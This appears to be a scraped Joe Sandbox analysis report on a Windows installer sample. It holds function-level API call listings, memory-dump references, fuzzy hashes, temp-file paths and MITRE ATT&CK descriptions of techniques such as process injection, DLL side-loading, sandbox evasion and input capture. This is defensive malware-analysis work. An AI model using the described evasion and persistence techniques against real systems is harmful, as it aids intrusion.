Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD

Function 734710E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 73471171
GlobalAlloc.KERNEL32(00000040,?), ref: 734711E3
GlobalFree.KERNEL32 ref: 7347124A
GlobalFree.KERNEL32(?), ref: 7347129B
GlobalFree.KERNEL32(00000000), ref: 734712B1

Memory Dump Source

Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: dded7603923c40227dce3309549501126f4c112bc5aa762bd89b7aae0edd4570
Instruction ID: eef431223a1ed32abf3f7d58748fd2c0fcf7f398e23594041edf40eb6edc423a
Opcode Fuzzy Hash: dded7603923c40227dce3309549501126f4c112bc5aa762bd89b7aae0edd4570
Instruction Fuzzy Hash: 02517BB6900301DFE718EF69C944BA677F8FB09714B14456AE94AFF350E734A901CB98

Function 00401BA0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(0066E140), ref: 00401C10
GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401C22

Strings

@f, xrefs: 00401BA3, 00401BD3, 00401BE2, 00401C0B, 00401C36, 00401C3D
Call, xrefs: 00401BC7, 00401BCD, 00401BE7

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Global$AllocFree
String ID: @f$Call
API String ID: 3394109436-1910501656
Opcode ID: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
Instruction ID: 755843c12eef3f61fe3821796784c52372e38f60d99e915cd62482290075d307
Opcode Fuzzy Hash: 1123cc6a0f383144ca4e0a98b12c217c63afdee534dd3928be857bb34d6716f0
Instruction Fuzzy Hash: 7D210872904254DBDB20FBA4CE84A5E73B8AB04718715093FF542F32D0C6B89C418BDD

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll), ref: 0040269A

Strings

C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll, xrefs: 0040265E, 00402683, 00402695, 004026E1
C:\Users\user\AppData\Local\Temp\nspD8D5.tmp, xrefs: 00402688

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp$C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll
API String ID: 1659193697-441332769
Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E

Function 00403C62 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000002E0,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C74
CloseHandle.KERNEL32(000002F4,C:\Users\user\AppData\Local\Temp\,00403B95,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C88

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403C67
C:\Users\user\AppData\Local\Temp\nspD8D5.tmp, xrefs: 00403C98

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nspD8D5.tmp
API String ID: 2962429428-568009694
Opcode ID: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
Instruction ID: 8c071fc62b7e332c461b44292a81ac7d95f2e272703a36c0b89becc6b1ca42eb
Opcode Fuzzy Hash: aee73ed6a062803200b229e34675cefdb9ab84dda1d90898f0442dcc956d8ee4
Instruction Fuzzy Hash: C9E04F3140471896D5246F78AE4E9853A185F41335B248326F078F21F0C738995A5AA9

Function 00406059 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

Part of subcall function 00405FFC: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,?,00406070,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 0040600A
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 004060B2
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004060C2

Strings

C:\Users\user\AppData\Local\Temp\nspD8D5.tmp, xrefs: 0040605F, 00406064, 0040606A, 004060AB, 004060B1, 004060B9, 004060C1

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp
API String ID: 3248276644-917692060
Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E

Function 0040567B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004056AA
CallWindowProcW.USER32(?,?,?,?), ref: 004056FB

Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F

Strings

, xrefs: 0040568B

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D

Function 00406550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067C1,80000002), ref: 00406596
RegCloseKey.ADVAPI32(?), ref: 004065A1

Strings

Call, xrefs: 00406557

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4

Function 00405F9D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\x6yDsHJ9tr.exe,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 00405FA3
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\x6yDsHJ9tr.exe,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 00405FB3

Strings

C:\Users\user\Desktop, xrefs: 00405F9D

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD

Function 004060D7 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

